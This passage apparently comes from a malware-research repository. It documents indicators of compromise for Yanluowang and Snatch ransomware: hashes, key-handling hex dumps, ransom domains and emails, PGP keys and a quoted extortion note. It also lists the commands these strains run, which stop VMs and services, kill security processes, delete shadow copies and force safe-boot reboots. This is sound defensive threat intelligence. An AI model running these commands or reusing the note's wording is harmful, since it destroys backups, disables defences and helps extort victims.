114 | 00F19688 5E C6 31 97 BE 65 F1 86 22 4F 32 0A 18 C9 2C CE ^Æ1.¾eñ."O2..É,Î 115 | 00F19698 A3 D8 50 61 9B 1E E6 5F 9E 3E 38 87 F2 77 8D 4B £ØPa..æ_.>8.òw.K 116 | 00F196A8 41 10 C5 FF AE B6 26 3A F8 2E 64 9B 81 39 37 43 A.Åÿ®¶&:ø.d..97C 117 | 00F196B8 83 AF 1B 6D 3E 24 31 F8 DC 74 2D AA 12 6E 98 03 .¯.m>$1øÜt-ª.n.. 118 | 00F196C8 60 7B FD 3F 91 BD 1D F4 40 11 3E 65 3F 93 48 C6 `{ý?.½.ô@.>e?.HÆ 119 | 00F196D8 3C F7 49 13 35 0B 7F 14 2F 8B 21 BA 23 E0 21 D7 <÷I.5.../.!º#à!× 120 | 00F196E8 D0 18 3F CA 8E C9 2A E4 E1 4B DA BB 67 E0 50 74 Ð.?Ê.É*äáKÚ»gàPt 121 | 00F196F8 B1 47 65 2A 9C C5 9A 29 0E 4E 98 52 BD 07 DA 6F ±Ge*.Å.).N.R½.Úo 122 | 123 | Final session key gets converted to Base64 124 | 00F1A920 58 73 59 78 6C 37 35 6C 38 59 59 69 54 7A 49 4B XsYxl75l8YYiTzIK 125 | 00F1A930 47 4D 6B 73 7A 71 50 59 55 47 47 62 48 75 5A 66 GMkszqPYUGGbHuZf 126 | 00F1A940 6E 6A 34 34 68 2F 4A 33 6A 55 74 42 45 4D 58 2F nj44h/J3jUtBEMX/ 127 | 00F1A950 72 72 59 6D 4F 76 67 75 5A 4A 75 42 4F 54 64 44 rrYmOvguZJuBOTdD 128 | 00F1A960 0D 0A 67 36 38 62 62 54 34 6B 4D 66 6A 63 64 43 ..g68bbT4kMfjcdC 129 | 00F1A970 32 71 45 6D 36 59 41 32 42 37 2F 54 2B 52 76 52 2qEm6YA2B7/T+RvR 130 | 00F1A980 33 30 51 42 45 2B 5A 54 2B 54 53 4D 59 38 39 30 30QBE+ZT+TSMY890 131 | 00F1A990 6B 54 4E 51 74 2F 46 43 2B 4C 49 62 6F 6A 34 43 kTNQt/FC+LIboj4C 132 | 00F1A9A0 48 58 0D 0A 30 42 67 2F 79 6F 37 4A 4B 75 54 68 HX..0Bg/yo7JKuTh 133 | 00F1A9B0 53 39 71 37 5A 2B 42 51 64 4C 46 48 5A 53 71 63 S9q7Z+BQdLFHZSqc 134 | 00F1A9C0 78 5A 6F 70 44 6B 36 59 55 72 30 48 32 6D 38 3D xZopDk6YUr0H2m8= 135 | 136 | Base64 gets added to the end of the ransom note 137 | 00F1B570 63 61 6E 67 2E 6C 65 65 6E 40 6D 61 69 6C 66 65 cang.leen@mailfe 138 | 00F1B580 6E 63 65 2E 63 6F 6D 0A 32 29 79 61 6E 2E 6C 61 nce.com.2)yan.la 139 | 00F1B590 6F 77 61 6E 67 40 6D 61 69 6C 66 65 6E 63 65 2E owang@mailfence. 140 | 00F1B5A0 63 6F 6D 4A 58 73 59 78 6C 37 35 6C 38 59 59 69 comJXsYxl75l8YYi 141 | 00F1B5B0 54 7A 49 4B 47 4D 6B 73 7A 71 50 59 55 47 47 62 TzIKGMkszqPYUGGb 142 | 00F1B5C0 48 75 5A 66 6E 6A 34 34 68 2F 4A 33 6A 55 74 42 HuZfnj44h/J3jUtB 143 | 00F1B5D0 45 4D 58 2F 72 72 59 6D 4F 76 67 75 5A 4A 75 42 EMX/rrYmOvguZJuB 144 | 00F1B5E0 4F 54 64 44 0D 0A 67 36 38 62 62 54 34 6B 4D 66 OTdD..g68bbT4kMf 145 | 00F1B5F0 6A 63 64 43 32 71 45 6D 36 59 41 32 42 37 2F 54 jcdC2qEm6YA2B7/T 146 | 00F1B600 2B 52 76 52 33 30 51 42 45 2B 5A 54 2B 54 53 4D +RvR30QBE+ZT+TSM 147 | 00F1B610 59 38 39 30 6B 54 4E 51 74 2F 46 43 2B 4C 49 62 Y890kTNQt/FC+LIb 148 | 00F1B620 6F 6A 34 43 48 58 0D 0A 30 42 67 2F 79 6F 37 4A oj4CHX..0Bg/yo7J 149 | 00F1B630 4B 75 54 68 53 39 71 37 5A 2B 42 51 64 4C 46 48 KuThS9q7Z+BQdLFH 150 | 00F1B640 5A 53 71 63 78 5A 6F 70 44 6B 36 59 55 72 30 48 ZSqcxZopDk6YUr0H 151 | 00F1B650 32 6D 38 3D 2m8=. 152 | ``` 153 | 154 | ### Ransomware executable digital signature: 155 | ``` 156 | Name: AdClearance Limited 157 | Thumbprint: 614A13CA73AE2F01D860B5F87B71CA38F5307DBD 158 | SN: 0D 0D A8 84 0C 1A 95 9D 09 32 47 FA 33 6E 5A 2D 159 | ``` 160 | 161 | ### Mutex: 162 | ``` 163 | Type=Mutant 164 | Name=\Sessions\1\BaseNamedObjects\SM0:pid:handle:WilStaging_02 165 | ``` 166 | 167 | ### E-mails from the ransom note: 168 | ``` 169 | cang.leen@mailfence.com 170 | yan.laowang@mailfence.com 171 | ``` 172 | 173 | ### Ransomware execution arguments: 174 | ``` 175 | -h 176 | -p 177 | -pass 178 | -path 179 | --help 180 | --pass 181 | --path 182 | ``` 183 | 184 | ### Ransomware extension: 185 | ``` 186 | .yanluowang 187 | ``` 188 | 189 | ### Ransomware note: 190 | ``` 191 | README.txt 192 | ``` 193 | 194 | ### Ransomware (-h) execution helper: 195 | ``` 196 | Syntax: encrypt.exe [(-p,-path,--path)] 197 | ``` 198 | 199 | ### Interesting commands executed: 200 | ``` 201 | cmd.exe /c powershell -command "Get-VM | Stop-VM -Force" 202 | cmd.exe /c for /l %x in (1,1,3) do start wordpad.exe /p 203 | ``` 204 | 205 | ### Terminated processes via (CreateToolhelp32Snapshot): 206 | ``` 207 | veeam 208 | sql 209 | ``` 210 | 211 | ### Skipped folders: 212 | ``` 213 | PROGRA~1 214 | PROGRA~2 215 | PROGRA~3 216 | SYSTEM~1 217 | Windows 218 | WINDOWS 219 | ``` 220 | 221 | ### Skip-list for extensions: 222 | ``` 223 | exe 224 | dll 225 | conf 226 | a 227 | lib 228 | bat 229 | ps 230 | msi 231 | cfg 232 | reg 233 | sys 234 | lnk 235 | obj 236 | ini 237 | yanluowang 238 | ``` 239 | 240 | ### Killed processes via (ShellExecute): 241 | ``` 242 | taskkill /f /im CNTAoSMgr* 243 | taskkill /f /im IBM* 244 | taskkill /f /im Notifier* 245 | taskkill /f /im Ntrtscan* 246 | taskkill /f /im TmListen* 247 | taskkill /f /im bes10* 248 | taskkill /f /im black* 249 | taskkill /f /im chrome* 250 | taskkill /f /im copy* 251 | taskkill /f /im ds_monitor* 252 | taskkill /f /im dsa* 253 | taskkill /f /im excel* 254 | taskkill /f /im firefox* 255 | taskkill /f /im iVPAgent* 256 | taskkill /f /im iexplore* 257 | taskkill /f /im mysql* 258 | taskkill /f /im outlook* 259 | taskkill /f /im postg* 260 | taskkill /f /im putty* 261 | taskkill /f /im robo* 262 | taskkill /f /im sage* 263 | taskkill /f /im sql 264 | taskkill /f /im sql* 265 | taskkill /f /im ssh* 266 | taskkill /f /im store.exe 267 | taskkill /f /im tasklist* 268 | taskkill /f /im taskmgr* 269 | taskkill /f /im vee* 270 | taskkill /f /im veeam* 271 | taskkill /f /im wrsa* 272 | taskkill /f /im wrsa.exe 273 | ``` 274 | 275 | ### Stopped services: 276 | ``` 277 | net stop IISADMIN 278 | net stop MSExchangeADTopology 279 | net stop MSExchangeFBA 280 | net stop MSExchangeIS 281 | net stop MSExchangeSA 282 | net stop MSSQL$ISARS 283 | net stop MSSQL$MSFW 284 | net stop MSSQLServerADHelper100 285 | net stop QBCFMonitorService 286 | net stop QBPOSDBServiceV12 287 | net stop QBVSS 288 | net stop QuickBooksDB1 289 | net stop QuickBooksDB10 290 | net stop QuickBooksDB11 291 | net stop QuickBooksDB12 292 | net stop QuickBooksDB13 293 | net stop QuickBooksDB14 294 | net stop QuickBooksDB15 295 | net stop QuickBooksDB16 296 | net stop QuickBooksDB17 297 | net stop QuickBooksDB18 298 | net stop QuickBooksDB19 299 | net stop QuickBooksDB2 300 | net stop QuickBooksDB20 301 | net stop QuickBooksDB21 302 | net stop QuickBooksDB22 303 | net stop QuickBooksDB23 304 | net stop QuickBooksDB24 305 | net stop QuickBooksDB25 306 | net stop QuickBooksDB3 307 | net stop QuickBooksDB4 308 | net stop QuickBooksDB5 309 | net stop QuickBooksDB6 310 | net stop QuickBooksDB7 311 | net stop QuickBooksDB8 312 | net stop QuickBooksDB9 313 | net stop ReportServer$ISARS 314 | net stop SPAdminV4 315 | net stop SPSearch4 316 | net stop SPTimerV4 317 | net stop SPTraceV4 318 | net stop SPUserCodeV4 319 | net stop SPWriterV4 320 | net stop SQLAgent$ISARS 321 | net stop SQLAgent$MSFW 322 | net stop SQLBrowser 323 | net stop SQLWriter 324 | net stop ShadowProtectSvc 325 | net stop WinDefend 326 | net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" 327 | net stop "IBM Domino Server (CProgramFilesIBMDominodata)" 328 | net stop "Simply Accounting Database Connection Manager" 329 | net stop firebirdguardiandefaultinstance 330 | net stop ibmiasrw 331 | net stop mr2kserv 332 | ``` 333 | 334 | ### Ransom note: 335 | ``` 336 | Hi, since you are reading this it means you have been hacked. 337 | In addition to encrypting all your systems, deleting backups, we also downloaded 2 terabytes of confidential information. 338 | Here's what you shouldn't do: 339 | 1) Contact the police, fbi or other authorities before the end of our deal 340 | 2) Contact the recovery company so that they would conduct dialogues with us. (This can slow down the recovery, and generally put our communication to naught) 341 | 3) Do not try to decrypt the files yourself, as well as do not change the file extension yourself !!! This can lead to the impossibility of their decryption. 342 | 4) Keep us for fools) 343 | We will also stop any communication with you, and continue DDoS, calls to employees and business partners. 344 | In a few weeks, we will simply repeat our attack and delete all your data from your networks, WHICH WILL LEAD TO THEIR UNAVAILABILITY! 345 | Here's what you should do right after reading it: 346 | 1) If you are an ordinary employee, send our message to the CEO of the company, as well as to the IT department 347 | 2) If you are a CEO, or a specialist in the IT department, or another person who has weight in the company, you should contact us within 24 hours by email. 348 | We are ready to confirm all our intentions regarding DDOS, calls, and deletion of the date at your first request. 349 | As a guarantee that we can decrypt the files, we suggest that you send several files for free decryption. 350 | Mails to contact us: 351 | 1)cang.leen@mailfence.com 352 | 2)yan.laowang@mailfence.comJ0mAm8SN6C0BPAImmRDBChtERC7nTlQ49bsh2xDb4IrtDvr17bCwy+GSiq+IFUT4H 353 | irx+WpNuWBzpS2CUO6pR+FkYoaltOtN+fMpogxD3jzCC29ksq2BfcXqLSIr/zJuz 354 | HJ3saoWSBxf0XTA5SMU1xJ0d/Nx/wu2t7Vb4sethsj4= 355 | ``` 356 | 357 | The J right after the email address is hardcoded, and not part of the base64 encoded key. 358 | `2)yan.laowang@mailfence.comJ0mAm8SN6C0BPAImmRDBChtERC7nTlQ49bsh2xDb4IrtDvr17bCwy+GSiq+IFUT4H` 359 | -------------------------------------------------------------------------------- /Ransomware/Snatch.md: -------------------------------------------------------------------------------- 1 | # Snatch ransomware 2 | 3 | ## SHA256s: 4 | - eebc57e9e683a3c5391692c1c3afb37f3cb539647f02ddd09720979426790f56 5 | - 78816ea825209162f0e8a1aae007691f9ce39f1f2c37d930afaf5ac3af78e852 6 | - 80cc8e51b3b357cfc7115e114cecabc5442c12c143a7a18ab464814de7a66ab4 7 | - ebcded04429c4178d450a28e5e190d6d5e1035abcd0b2305eab9d29ba9c0915a 8 | - fe8ba1eaf69b1eba578784d5ab77e54caae9d90c2fb95ad2baaaef6b69a2d6cb 9 | - 28125dae3ab7b11bd6b0cbf318fd85ec51e75bca5be7efb997d5b950094cd184 10 | - 0ce4c4af321ff02928aacf105f03dead87e85003080586615755f278770f5adb 11 | - 36a4311ef332b0b5db62f8fcabf004fdcfbbde62f791839a8be0314604d814c4 12 | - d0ddc221b958d9b4c7d9612dd2577bec35d157b41aa50210c2ae5052d054ff33 13 | - e8931967ed5a4d4e0d7787054cddee8911a7740b80373840b276f14e36bda57d 14 | - ae9cdbb717625506ed0df7af153dc2741395655aeb1da2f91079e3ea616af6a1 15 | - 5f24536e48f406177a9a630b0140baadff1e29f36b02095b25e7e21c146098bb 16 | - c0f506e98f416412b3a9dcd018341afab15e36b15bac89d3b02ff773b6cc85a6 17 | - 36a4311ef332b0b5db62f8fcabf004fdcfbbde62f791839a8be0314604d814c4 18 | - 8c9fab558b3e9e21936a91422d9e2666f210c5fd7d9b0fd08d2353adb64a4c00 19 | - 329f295b8aa879bedd68cf700cecc51f67feee8fd526e2a7eab27e216aa8fcaa 20 | - ab6b0d00ba8f8553c015743b9da8761a9b1fca750d3f73bda573a8fbc47dafa1 21 | - 63c2c1ad4286dbad927358f62a449d6e1f9b1aa6436c92a2f6031e9554bed940 22 | - d22b46ea682838e0b98bc6a1e36fd04f0672fe889c03d227cdeb5dcc5d76ae7c 23 | 24 | ## Seen commands: 25 | - vssadmin delete shadows /all /quiet 26 | - bcdedit.exe /set {current} safeboot minimal 27 | - shutdown.exe /r /f /t 00 28 | - net stop SuperBackupMan 29 | 30 | ## Touched registry keys: 31 | - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SuperBackupMan 32 | 33 | ## Build IDs: 34 | - Go Build ID: `9sbGxHyc5vSAXzwvg6iZ/c_gG_xy9d6xmNt9nMlii/HdKHUjGFLxliYJycPc5E/yTT_FNpw78SfII62lGUn` 35 | - Go build ID: `2KZVw_piBNB6c74hlRt4/ueMyrcUcK4ismcjykWop/ZQYGFEYcaBSofxZbcs4g/GK-7e3PY8vHyy_lSkbVi` 36 | - Go build ID: `jPF3Jrx2uZ7VjN0GyDBL/x3B31XZylJgOhAVFZiym/o_aCHMB9kgaxIibXVOox/VQQhgCuLOuABGRrXzFdl` 37 | - Go build ID: `ULgusZVAlPcWOJcj9LKW/fOp_xyXqQQO5nzk3CZIW/LV-l8Ye8SLuN39dCmiDH/_34hEcu3a_yVC0sdeBdP` 38 | - Go build ID: `BIFnB6MdgF4djhq39TIM/0F-O_BMJNaIkMOFRC1kQ/j2Fm9d-Ilq-6KP4f1cuF/I07Xn6PJTdAcrP3IsVX4` 39 | - Go build ID: `cN2S005MM6pjpFXzNYd7/Lu1OzfnOLXKCy8mQdge9/GnIsH3q8hyF-pEAWP4K0/ISXM5yfoGT6hDQpcP08E` 40 | - Go build ID: `jPF3Jrx2uZ7VjN0GyDBL/x3B31XZylJgOhAVFZiym/o_aCHMB9kgaxIibXVOox/VQQhgCuLOuABGRrXzFdl` 41 | - Go build ID: `D4uZyyRaOm8WP2m599HU/gZkWHWmCm-S2lk0u6tJQ/F9Wz3xBbUlF3TISfF8Gu/uPBkEF2KfTla4ver6O79` 42 | - Go build ID: `nz4NhyAgWYITxG9Gw5rT/an0sbWQDT73tZEat72I5/KKmIcIIeFCNSYj4p5koW/BHky2GAanYgZQqXGSyei` 43 | - Go build ID: `5-A2FKXbqQxWZGpMv5bi/ysyqhwQZ0g_FlybbfpOj/gPShdrjwHV2q1IVo0Bfv/VrGig2m_K67aAwzTrv-d` 44 | - Go build ID: `7fR8nrem5X2guhWKTPqX/q9bOGJlbcqSoZeCNpJdo/mOeL2egnn8VuZltxekp2/kA3DJl8bjxG0VOFnIT50` 45 | - Go build ID: `fAuIatqF3y2yPFaOAmMh/Et041_4MdPXnmmKEPTI8/bLick1lrFdeTrGIZYxo0/BvSPmptslW8GXm3csJBq` 46 | - Go build ID: `PMCyRyS181ZPRw9CPWkE/BJ5j2V8jsBgo1aLecx02/-mWXZMHLo88PEQt8rTZh/6GyAnytdqm84O_xZwCVm` 47 | - Go build ID: `nB7zOcAzQudulTvhaVuz/uWzvsXECCzDi31bEsmeR/mdhphV43beOO8Hzgn3aY/1oICpWzuVziHGBPyIaWN` 48 | - Go build ID: `TaXB1rNPyYrygpK-oZNY/O0ppKu626ti9yZPiCuBy/HNBUBG6libSaTytSLJmj/ePd3gggAZvpTekDGyMGd` 49 | - Go build ID: `TXyoACiHB6yxvG0Yd6kP/hzi7-6t6mqUmTJ9J66t_/ZKtxycPXIUbozCq82XXw/eaQW7T0yucgUkYHrfeB6` 50 | - Go build ID: `xj_rOMfBvvcseIbyjASX/hE4P0VpinFe8VwzMdQb8/WM7Lm2U1MfJFgmiWnFRV/exQGRNv1v9l--efSLCbV` 51 | - Go build ID: `zxnj4797V-v_vkqaAHGu/BSTalyYehfQcP1Dv83BC/hn0rES9XcX2jjV8Ef_rk/1HCK9U9y8XUVnZ8kpISL` 52 | 53 | ## Ransom sites: 54 | - mydatasuperhero[.]com 55 | - mydatassuperhero[.]com 56 | - storedataresback[.]com 57 | - snatch24uldhpwrm[.]onion 58 | - snatchh5ssxiorrn[.]onion 59 | - snatch6brk4nfczg[.]onion 60 | 61 | ## Ransom e-mails: 62 | - imBoristheBlade@protonmail.com 63 | - jimmtheworm@dicksinmyan.us 64 | - doctor666@mail.fr 65 | - doctor666@cock.li 66 | - newrecoveryrobot@pm.me 67 | 68 | ## Ransom extensions: 69 | - .snatch 70 | - .jimm 71 | - .googl 72 | - .dglnl 73 | - .ohwqg 74 | - .wvtr0 75 | - .hceem 76 | - .v9zfe 77 | - .dadzj 78 | - .jhxgu 79 | - .tnvcf 80 | - .pywdu 81 | - .r0nph 82 | - .peb4w 83 | - .fanot 84 | - .hwie5 85 | - .pywdu 86 | - .lyptm 87 | - .v6cye 88 | - .a9xtk 89 | - .z5kt6 90 | - .pino5 91 | - .cbs0z 92 | 93 | ## Ransom notes: 94 | - Readme_Restore_Files.txt 95 | - README_A9XTK_FILES.txt 96 | - README_HWIE5_DATA.txt 97 | - Restore_JIMM_Files.txt 98 | - RESTORE_DGLNL_FILES.txt 99 | - RESTORE_V6CYE_FILES.txt 100 | - RESTORE_LYPTM_FILES.txt 101 | - RESTORE_WVTR0_FILES.txt 102 | - RESTORE_PEB4W_DATA.txt 103 | - RESTORE_PYWDU_DATA.txt 104 | - RESTORE_HCEEM_DATA.txt 105 | - RESTORE_CBS0Z_DATA.txt 106 | - DECRYPT_GOOGL_FILES.txt 107 | - DECRYPT_OHWQG_FILES.txt 108 | - DECRYPT_JHXGU_FILES.txt 109 | - DECRYPT_TNVCF_FILES.txt 110 | - DECRYPT_R0NPH_FILES.txt 111 | 112 | ## PGP keys: 113 | ```pgp 114 | -----BEGIN PGP PUBLIC KEY BLOCK----- 115 | mQENBFweVqABCAC3PXE/MxccyzOYJfdHzoPsYDbL5SrdKP3ILKf4h6t02zgEfWrF 116 | 0ttz4dSa+91Tyc3QAGFtk/2etVgPI0/gGr0KowSZmORpT/Iwd0GupgkkOgrB74k9 117 | 0C1KRycFqJZ8MBLwhlIXvH7VimH5CKEC/LpmvhAl1xXtPm1j/uNpFXsrJR8ylOLL 118 | PlZGq0wsNwJOJPEjNyG0bjJbAT5yTTCDNdff7n0kHZuGjLFAB1m+BTG8qfkty9up 119 | 0dAIm0Qrw2dMBy7qXB+XFZXBWWMIl+fw09E1PuhL4D2srNRlooJ60uuFVTVbHUgs 120 | iQfyKgxHhrg4JuhKqQCWk5ott8xRR+IN5y+dABEBAAG0CEJNS2dyb3VwiQFUBBMB 121 | CAA+FiEE+s9TvJ78zuMzMyWzKmTlL/HLOL4FAlweVqACGwMFCQPCZwAFCwkIBwIG 122 | FQoJCAsCBBYCAwECHgECF4AACgkQKmTlL/HLOL65Uwf+Os21LjmJmwFIGy/vKyfq 123 | 8p9wMvQMtTrbb7ANFTs6vm3WQmzsYfM8P/X6lu3bfYLVf/oyEfYhbSFmXZjprUV+ 124 | TGdmVu8slQKLDdMEqSmQLefSUpG8ymrkpOtGFh0INll7cybGPF5waq03gNKGj7nR 125 | FoRzpNJPmVbtzcBWtRb8l8c7xV0eOILZkPi/JIfE5dJ53yZv0VrhB0YjI7OE2PCd 126 | UnftPW9Kz6VfH17+umCBx4/bouIszcY72SeJfZgigRTV1OFQ6tNGcYjNQvAi48MT 127 | ncY6YvVb43RGC03RZVaDbqkXVnqX7k6YqRapd+mGg651MgaLy42lmuuCJPMX0VAP 128 | h7kBDQRcHlagAQgA04wYhhHLC4vB+pAM0xk8WS+lTbBp3hwWIU6vBAdnAH15KgIh 129 | ElNnD62te6k9xxg6hEY7k8bl1jog80ub8HG+DNBi4LV+BAD/5yETQuxaVD//kmvo 130 | eULmb+Pjl6eorvf6YnpQqN9WCXUMTwHJOwT37wx3KI6B/tPuGelMTCkU6tdhHOmD 131 | AnpY6kNEaPC9UoGLMMuxIZGqHJviNtFIpzbFQe5yZJoN4wc1yHMw0EZ/lmdsA6mU 132 | iSCWFl22hlmqP1j2XNW81v2B8YQpJn4F9jheeBxxqQ102RwGgz6yPIJwKBoDs4YC 133 | ATSbEJdUz5QbNZTKl5vB2/jlwNHmMTXY2Gc/pQARAQABiQE8BBgBCAAmFiEE+s9T 134 | vJ78zuMzMyWzKmTlL/HLOL4FAlweVqACGwwFCQPCZwAACgkQKmTlL/HLOL5FLAgA 135 | nU888FA/rudDf2oKlYJx1qkPG8kSwTIAqv+K13rR5+B7t3kaW0rhlYpHM9Jyy65L 136 | UPV1gzrwPJdOOuY6bKyFI8I0mok74Nxlzd/SVBbUZDqWzgn1mZJeO8hVrrF2VBN5 137 | b8PCi+FxJU6f9/yMWsgrM5E6QfyC+HOfWfVGisyPyUo+f18ouqOC+zNHSP5rQhVY 138 | oWmFLy1/jOzjFVs9nmuT5A1h84PAElR2QyDDWraGffWiqanx4klZpheL35hj4O60 139 | gTDlSWWQhrTAXRDQlp8KMzFjKsXE/GBJPcBMKhEh0Qyjaf6dEdDFjZeKQB6ibAuv 140 | kCdVOtU2uOwFY5k4VsGkjA== 141 | =R6+l 142 | -----END PGP PUBLIC KEY BLOCK----- 143 | ``` 144 | 145 | ```pgp 146 | -----BEGIN PGP PUBLIC KEY BLOCK----- 147 | mQENBF2aIIIBCADBn685GzDuQ15fin4zpnpCzNhbDjVQ74Rq7irrPEQyL1SowxXj 148 | n40SVd/xnwCNeoMiA2feLPN+fs9cPAsSgXQd6fRDGCanfEe5JBlrSniOB4iU+MFe 149 | /RRHO8VEe63MWTuoA3k5qwbvpajPesX0tIQf+4F2YhkhRyNGUUoj1ePc1F2Knhcg 150 | 4JwsRwWgV/yOy3HsfWRb7BLLGDy0CaRmKvXa7Doo3mHD9FsvITN/MbFLA2v27ab5 151 | mNY/Ehg5JAbF3Wm7jSFcRcBvEwv457lPOT4HuyZaCpn3L/SA/BfUGtoVZeapxmcy 152 | Em9S4S09pyvGJyJc6XMbYH+7FHwH1KxysVzXABEBAAG0FHl1YnBzbGpmeHJldmdu 153 | d2F0ZGl6iQFUBBMBCAA+FiEEAaFwnu8Dq/zRU0diEqGvgbEO/y0FAl2aIIICGwMF 154 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQEqGvgbEO/y3f8gf/ayin 155 | A31IlxasEmsqVyV+qTN5i9yi3sGQ6ItdrQOEOqnxBcx70cmXllA+MJO3UjRlVX6B 156 | h7rCwMfbxH5r8j9Ga/Uuci5doTQ9hSaBCcodloWxuKy6nYtfiHhNUhNRZ31WASek 157 | y5aw9aZkmgwA05n8bO04jd2y3nlSKpN8S0gwbdW8MBH4mftqpyM7VnZTxCkYh4T+ 158 | wGd5NxZtzU0+awx6nZjqrQeVlaKu7hLK5WHPqOkYPjVm0+3YVAOSDo718pZz9L5X 159 | zyVkaXWXC3qwOxVOzR2KZkEx/VJvl99zgvpdd3V7nZeFC6W32v2aAjvO15yCaooa 160 | dnKGwp9Y3X+18DXPtbkBDQRdmiCCAQgAt3ATiseIov9Ze75CHHO0/mX80dkAjqhC 161 | 4bK5WM2YCfifzZm9SANs/zxzUc5AeTfxyU5LXfhF5USJHZBaZ76G6jUD8u46Vwpi 162 | OQUJ/VDkjggAm4rEGwEsGj0x5bx366mrGiPydTU4e8g544v/o+V7ByxhiPnEoEp2 163 | citAMpI8ZL/qMTJ/P7EZ5UEpL/meBfuZlfl1Z2NBlNgsTuPn/9ZSuK0Wyv0wCOyE 164 | 1dp8KPGAvN0oMOoymgXTEN2aaViR932r5p4T54OpE2wkLHnFGBLTkmvOrDAWDzY8 165 | oAxLYGWME/fpVoC9aFQmhsfjcyeMK9DuRAI/0tdvHLwEr3uN5ksF2QARAQABiQE2 166 | BBgBCAAgFiEEAaFwnu8Dq/zRU0diEqGvgbEO/y0FAl2aIIICGwwACgkQEqGvgbEO 167 | /y3O9Af/exVH5VBL4j9d17NStn0mUsAs6YSMOAZV743SIJOPib9r+VkBeTVr4oEe 168 | 2TOcXZd5BwMdXc27eZlOVUYudGgZ8uZQ/AaujXZVN/6zEqzIXQV0lMMdFKJf/dVz 169 | 0bSSzIa96amJSL43P7pEL4WiW2RoPQbLF9oMmq1MaaPjyGHf29G7FhHE1e3UkzXM 170 | ewIur86aYyF7fJq0mOWmvqp2BFULx8ilAz7a1Gx8wMTLtNma4rEQCojLv4sUQb+x 171 | GXLTkTJxiSvSuX87SBPB3si6OXVzkyteyNQcghsa3GW7EVUa4RjypaTCVNy89YSf 172 | OqAL/ehJMc820ZnYc/acROujBW253A== 173 | =gCZP 174 | -----END PGP PUBLIC KEY BLOCK----- 175 | ``` 176 | 177 | ```pgp 178 | -----BEGIN PGP PUBLIC KEY BLOCK----- 179 | mQENBFzOpcIBCAC0dyP274m5SfR8MQi13d8HJR3yY/NBBDUEuKIXbn1Y1ZhB9t+l 180 | wqxxC8NdHVHi10WTecngJf6jgofUgQVeZvMFVKM2XEb89nM1nCnvLq0x6dJGq0jj 181 | hC68G0gmZ5LpfpVVsvZF3dJT1Et8Qwqy1W9fG59QoU52H7ItnZMWpqrqhDIFyB9s 182 | 2mIBEvC+0MiBCk1mIqfR3dqyjiyWP2gbn1jvZuKdgLnrFATMWwfFWkR8LFT9yaZw 183 | lNZ7QXVP42sHr61ZoArc0VExfL/DnpfAZI2w05DUcSeI0fTGR5jT/QZ+Pty4pVu8 184 | FAyOAL3SMhEzxj0M/P/5i/ZfH9uXSHuyxkA3ABEBAAG0FGdwaXJmYWhsb3V3ZGpj 185 | eG1uZXpiiQFUBBMBCAA+FiEEAr2nqlfJey8vDYU7cT+CKj7ZscEFAlzOpcICGwMF 186 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQcT+CKj7ZscH67ggAp2wL 187 | A1R7XfmaxHfwpNGjcLZKGkXT4JFwJ9Y7bDHUNU/8JQmM2JXkMPxsmW+2L9Dc10Tp 188 | U6VWHnAazzVRmXDaD5bh2IGukR9AmoYh9vmXgt6sDnwsowk06/xUmtnjOHM/9Iob 189 | Ezgw1yK0Oizs1Jv3SbuwuyafuMhQQCvbPhHKpuo8IXJyBW7fY495rUPz86krODZR 190 | jE7b3ebEHrTSXfbzXiYWcFKYyaYTLqcjr1KzAiHM0djRcb/UpI/oulowF+iOy5v/ 191 | HjD521KsBDcZ/sUxY57jLyvyJY0DH9UwvS0gzcc5U0nVkKWJPy0Kgl2dnboOchMX 192 | KX+0gJkBGIvSEe+7m7kBDQRczqXCAQgAsECvMybub0TWtlpwnCSP0d/JV0mOrG/i 193 | qtOWlHH+fxfgUFWLSTfAg39/2sNmz4nP+lMpNdz90vxcDwOv33Ul6OCebVDE/kHq 194 | NaZM2IEeUY/iGlvQZoWX1QLHhjDoQMMdvruZFozlthOZDqA6J+2XM6vID/qwz7UY 195 | O6gTJVBWCgb42yc0CxvGNEGFmi4fM46P2BLbx2+GReIRGs5NFB04hjpTlzGAELXn 196 | 4aFLToA7iW4j1CKrOhVIef/FDeuSnf239Dbg/vXp70E/wKTgthv2qf7Yb9GEAvI1 197 | +G8Kj+GuZaRGEfHNxjjI+0emhx6C4OlGGyIMZ+ImGXrm8theg4gpPQARAQABiQE2 198 | BBgBCAAgFiEEAr2nqlfJey8vDYU7cT+CKj7ZscEFAlzOpcICGwwACgkQcT+CKj7Z 199 | scGnvwf/fZuxldvO/tgHMv6SUsM0qQ9FO0r4gvqHjeTxq2vG/pOsZ+bweGG8XS0b 200 | bB5OtMOY+ipFDrHXiWk1Zwe4ck+8LUAIkuwvGCJfom7FCe6tmYBMXpkNWv0Do8W9 201 | IeQjyHfawClmM6Rm91UDm/9xHHCUCe7DKGe/QjHaRysfXuuKrWN/o+FROeEn3eu4 202 | BXTWmmHuc09VcqtnjRpiDRSgKjKm/nR51MjOds+M7E/ESdHWLx1/JQT02vYs5jfU 203 | n65Dcbbvo7BdIbRiuR/RMPYEj/t1YGCVLaAP6yQAa5DdXWAFDoUiocn7fXxnWIwc 204 | Y3Xkzp1of0332FAFWuriZUj6dCL7HQ== 205 | =xibY 206 | -----END PGP PUBLIC KEY BLOCK----- 207 | ``` 208 | 209 | ```pgp 210 | -----BEGIN PGP PUBLIC KEY BLOCK----- 211 | mQENBFzKqdsBCADT/Qah/29i6qTfHYEa9WGdC04/KV8w6tYH1G6fAFAK9gRSWdbG 212 | 1JWiipNmpOYkJG4BXSPo/J1ppP5L3CHY0fwk0yAkyGPjNtbiHJxFJ1/MBeQOmKJe 213 | //4mSDwgdBGxh8cqodbAiWYGVmiDurCtRypoKipfcx1lI1+0DPnNuK7qY6U1Wnel 214 | UEZpiyyHLiidCCy+MJoDj0jPxhu3nLzdCwKsOfLA91+nf1fqzlIjw/AXvIieh+ye 215 | KhTACsROqlbBoXc+YtLsJ+o/tugtmpy+f4MYSKnlEaYQ+/nxc4hefoPVwlgK9Ei1 216 | L8qOwezwYDvBubCCTDxiyIOXnVOB7XH+ifdzABEBAAG0FHdlb2lxa3NyeWpidnBo 217 | ZmRnY3R4iQFUBBMBCAA+FiEEK0PX/7RtDECqmQX4CixyEGMJDEIFAlzKqdsCGwMF 218 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQCixyEGMJDELDdwf/dQcU 219 | 